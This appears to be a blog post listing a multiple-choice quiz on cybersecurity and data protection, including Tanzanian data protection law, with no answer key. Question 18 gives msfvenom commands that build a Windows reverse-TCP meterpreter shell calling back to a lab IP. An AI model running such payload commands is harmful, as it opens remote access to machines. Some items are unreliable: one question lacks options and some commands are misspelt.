Question 2: when should an SHA-256 hash check be performed when processing evidence?
Question 3: Which one of the
following individuals is normally responsible for fulfilling the operational
data protection responsibilities delegated by senior management, such as validating data integrity, testing
backups, and managing security policies?
A)
Data custodian
B) Data owner
C) User
D) Auditor
Question 4: What is the
MOST common security risk of a mobile device?
A) Insecure communications link
B) Data leakage
C) Malware infection
D) Data spoofing
Question 5: What technology could Amanda's employer
implement to help prevent confidential data from being emailed out of the organization?
A) DLP
B) A firewall
C) UDP
Question 6: What is the purpose of a security information and event management (SIEM)
system?
A)
To enforce security
policies and control
access to a network
or system
B) To monitor
network traffic for signs of compromise and alert security
personnel to potential threats
C) To identify vulnerabilities in a network
or system by scanning for known security
weaknesses
D)
To detect and block malicious
traffic
Question 7: What three
types of interfaces are typically tested during
software testing?
A)
Application, programmatic, and user interfaces
B) APIs, UIs, and physical interfaces
C) Network interfaces, APIs, and UIs
D) Network, physical,
and application interfaces
Question 10: What is the
purpose of the data protection audit under the Tanzanian Data Protection Act?
A)
All options are correct
B) To obtain certification from the Personal
Data Protection Commission
C) To identify areas for improvement in the policies
D) To assess
the organization’s compliance with data protection regulations
Question 11: Which system does SSL use to function?
A) DES
B) JOES
C)
PKI
D) AES
Question 12: What is the advantage of RSA
over DSA?
A) It can provide digital signature and
encryption functionality
B) It uses fewer resources
and encrypts faster
because it uses symmetric keys
C) It is a block cipher
rather than a stream cipher
D) It employs a one-time
encryption pad
Question 13: What malware
analysis operation can the
investigator perform using the
jv16 tool?
A) Files and Folder Monitor
B) Network Traffic
Monitoring/Analysis
C) Registry Analysis/Monitoring
Question 14: What is the first step in conducting a Data Protection Impact Assessment (DPIA)?
A) Identifying the data processors
B) Documenting the processing activity
C) Mapping data
flows
D) Identifying potential
risks to data
subjects
Question 15: Which regulation requires companies to appoint a Data Protection Officer (DPO) if they process large amounts of personal data?
A) Cyber Crime Act, 2015
B) National Payment
Systems (NPS) Act, 2016
C) EPOCA
D) The Personal
Data Protection Act, 2022
Question 16: What is the primary
purpose of a security incident
response plan?
A)
To encrypt sensitive
data during transmission
B) To detect and remove
malware from a system
C) To block malicious websites
D) To outline
procedures for responding to and managing
cybersecurity incidents
Question 17: What is data minimization?
A) Using minimal resources to process data
B) Limiting the data
collected to what is necessary for the purpose
C) Storing data in
the smallest format possible
D) Deleting unnecessary data after one year
Question 18: What is the correct
way of using MSFvenom to generate a reverse TCP shellcode
for Windows?
A) msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe>shell.exe
B)
msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f Shell.exe
C) msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPort=4444 -f c
D) msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
Question 19: What type of vulnerability scan accesses configuration information from the systems it is run against as well as information that
can be accessed via services available via the network?
A)
Web application scans
B) Port scans
C) Authenticated scans
D) Unauthenticated scans
Question 20: Which among the following is the best example of the
third step (delivery) in the cyber
kill chain?
A)
An intruder creates
malware to be used as a malicious attachment to an email
B) An intruder
sends a malicious attachment via email to a target
C) An intruder’s malware is installed on a target’s
machine
D)
An intruder’s malware
is triggered when a target
opens a malicious
email attachment
Question 21: What does "privacy by design" mean?
A) Developing systems
without considering data protection
B) Ignoring privacy considerations in system development
C)
Integrating privacy features
into systems from the beginning
D) Adding privacy
features after system
development
Question 22: What type of attack
is the creation and exchange
of state tokens intended
to prevent?
A)
CSRF
B) SQL injection
C) XACML
D)
XSS
Question 23: What does the term "zero-day vulnerability" mean in
cybersecurity?
A)
A vulnerability that has
no impact on cybersecurity
B) A vulnerability that affects
zero systems
C) A vulnerability that remains
unpatched by the software vendor
D)
A vulnerability that has never been discovered before
Question 24: What is the
main focus of data protection impact assessments (DPIAs)?
A) To assess
the risks of personal data and privacy
B) To determine the marketing potential of personal
data
C) To review the technical specifications of data systems
D) To evaluate the financial
impact of data protection laws
Question 25: Which one of the
following is not a valid key
length for the Advanced
Encryption Standard?
A) 256 bits
B) 384 bits
C) 128 bits
D) 192 bits
Question 26: What is the
purpose of data anonymization?
A)
To ensure data accuracy
B) To remove identifying information to protect privacy
C) To make data processing faster
D) To enable data sharing
with third parties
Question 27: What is the correct
order of execution for security
architecture?
A) Strategy and program management, project delivery, governance, operations
B) Governance, strategy
and program management, operations, project delivery
C) Strategy and program management, governance, project delivery,
operations
D) Governance, strategy
and program management, project delivery, operations
Question 28: Why would you need to
find out the gateway of a device when investigating a wireless attack?
A)
The gateway will be
the IP of the attacker computer
B) The gateway will be the IP of the
proxy server used by
the attacker to launch the attack
C) The gateway will be the IP used to manage the RADIUS server
D) The gateway
will be the IP used to manage
the access point
Question 29: Which command
can provide the forensic investigators with details of all the loaded modules
on a Linux-based system?
A) Isof -m
B) Ismod
C) plist mod -a
D) list modules -a
Question 30: What is the term used to describe a cybersecurity attack that occurs
simultaneously from multiple sources?
A)
Coordinated attack
B) Spear phishing
C) Zero-day attack
D)
Brute-force attack
Question 31: What type of attack
occurs when an attacker can force a router to stop forwarding packets by flooding
the router with many open connections simultaneously so that all the hosts
behind the router are effectively disabled?
A)
ARP redirect
B) Physical attack
C) Denial of
service
D) Digital attack
Question 32: What is the purpose of a
Data Protection Policy?
A)
To increase data storage capacity
B) To improve marketing strategies
C) To ensure compliance with financial regulations
D) To outline
how an organization will manage
and protect personal
data
Question 33: What does the right
to data portability entail?
A) The right to access
personal data
B) The right to transfer personal
data to another
organization
C) The right to update personal data
D)
The right to delete personal data
Question 34: What is the principle
of accountability in data
protection?
A) Ensuring data is encrypted
B) Demonstrating compliance with data protection laws
C)
Keeping personal data for
as long as
necessary
D)
Minimizing the data collected
Question 35: When using Windows acquisitions tools to acquire
digital evidence, it is important
to use a well- tested
hardware write-blocking device to
A) Prevent contamination to the evidence
drive
B) Acquire data from
the host-protected area on a disk
C) Automate collection from image files
D)
Avoid copying data from the boot partition
Question 36: What utility
could be used to avoid
sniffing of traffic?
A) Proxyfy
B) Shark
C) SandroProxy
D) Psiphon
Question 37: What is the consequence of non-compliance with data protection regulations?
A) Financial penalties
and legal action
B) No consequences
C) Increased customer
trust
D) Improved data security
Question 38: What feature
enables code to be executed without the usual security checks?
A) Race conditions
B) Process multiplexing
C) Temporal isolation
D) Maintenance hook
Question 39: What type of security
issue arises when an attacker
can deduce a more sensitive piece of information
by analysing several pieces of information classified at a lower level?
A) Inference
B) Parameterization
C) SQL injection
D) Multilevel security
Question 40: What is the "right to be forgotten"?
A)
The right to access personal data
B) The right to have personal data erased
C)
The right to object to data processing
Question 41: What is the purpose of a security
token in authentication?
A)
To encrypt sensitive
data during transmission
B) To verify
the identity of a user
C) To detect and remove
malware from a system
D)
To block spam emails
Question 42: What does "data retention policy" refer to?
A)
The method of storing data securely
B)
The process of archiving data
C) The length of time personal data is kept by
an organization
D) The frequency of data backups
Question 43: Which term describes the unauthorized access
and retrieval of data?
A) Data retention
B) Data processing
C) Data breach
D) Data encryption
Question 44: What is meant by
"data breach"?
A)
A software update
B)
A loss or theft of physical data
C) An unauthorized access or disclosure of personal data
D) breakdown failure
Question 45: Which principle requires that personal
data be collected for specified, explicit, and legitimate purposes?
A) Data minimization
B)
Purpose limitation
C) Storage limitation
D) Accuracy
Question 46: What mode must be configured to allow an NIC to capture
all traffic on the wire?
A) Extended mode
B)
10/100
C) Promiscuous mode
D) Monitor mode
Question 47: What security
control does MAC cloning attempt
to bypass for wired networks?
A)
VLAN hopping
B)
802.1q trunking
C) Etherkiller prevention
D) Port security
Question 48: What does the term "pseudonymization" mean in data
protection?
A) Encrypting all data
B)
Storing data in a secure physical
location
C)
Deleting old data regularly
D) Replacing private
identifiers with fake
identifiers
Question 49: Which section
of the assessment report addresses separate vulnerabilities, weaknesses, and gaps?
A) Risk review section
B)
Key findings section
C)
Executive summary with full details
D) Findings definition section
Question 50: What is the purpose
of the data protection register
maintained by the Personal Data Protection
Commission in Tanzania?
A)
All options are correct
B)
To facilitate the enforcement of data protection laws
C)
To record all data processing activities in the country
D)
To register all data controllers and data processors
0 comments:
Post a Comment